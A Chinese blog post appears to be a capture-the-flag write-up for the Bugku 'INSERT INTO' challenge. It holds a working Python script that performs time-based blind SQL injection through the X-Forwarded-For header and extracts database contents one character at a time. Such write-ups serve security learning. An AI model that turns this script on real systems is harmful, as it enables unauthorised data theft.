美文网首页
bugku INSERT INTO注入

bugku INSERT INTO注入

作者: 牛一喵 | 来源:发表于2018-10-24 15:37 被阅读0次

分析了下,关闭了错误报告,并且把我们的ip记录到数据库中查询。

可以通过这个X-Forwarded-For进行注入,这是http头注入,

进行测试,发现是时间盲注,写脚本去查询数据库 、表、字段、内容。

import requests

url="http://123.206.87.240:8002/web15/"

flag=""

for i in range(1,33):

    for str1 in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^&*``.":

        data="1' and (case when (substr((select group_concat(flag) from flag) from " + str(i)+" for 1 )='" + str1 + "') then sleep(4) else 1 end )) #"

        headers={'X-ForWarded-For':data}

        try:

            result=requests.get(url,headers=headers,timeout=3)

        except requests.exceptions.ReadTimeout:

            flag+=str1

            print(flag)

            break

print(flag)

从而得出flag,测试其他的东西的时候只需要修改data就可以。

相关文章

  • bugku INSERT INTO注入

    分析了下,关闭了错误报告,并且把我们的ip记录到数据库中查询。 可以通过这个X-Forwarded-For进行注入...

  • Bugku-INSERT INTO 注入

    INSERT INTO 注入 原题链接 http://120.24.86.145:8002/web15/ 分析 题...

  • Bugku sql注入

    成绩单 输入1,2,3发现都会显示不同的成绩单,输入4没有东西,输入1’没有东西显示,输入1’#又有了,测试了一下...

  • bugku sql注入2

    进去这个题发现也没有源码信息,试了下用户名,别的用户名都说用户名错误,除了admin,当我输入admin' --想...

  • SQL手动注入

    一.本文介绍 1、本文介绍手动联合查询注入、information_schema注入、函数报错注入、insert注...

  • SQL注入之insert注入

    insert注入: 在用户名输入: payload 1. 爆表名 2. 爆列名 3. 爆内容

  • SQL注入之delete注入

    delete注入: 找到删除链接: payload 然后就可以仿照SQL注入之insert注入这篇文章的方式往下进...

  • SQL注入之http头注入

    http头注入: 刷新进行抓包: payload 然后就可以仿照SQL注入之insert注入这篇文章的方式往下进行注入。

  • bugku实战2-注入

    打开页面寻找注入点,发现有一个页面下id=25,yes,可以进行注入了,比较简单,主要是记录下过程。 id=2 a...

  • BugkuCTF-Insert into 注入

    由于种种原因,这道insert into注入始终没有做出来。类型上并不算什么顶尖难题,属于写脚本解决的xff头-s...

网友评论

      本文标题:bugku INSERT INTO注入

      本文链接:https://www.haomeiwen.com/subject/pxzttqtx.html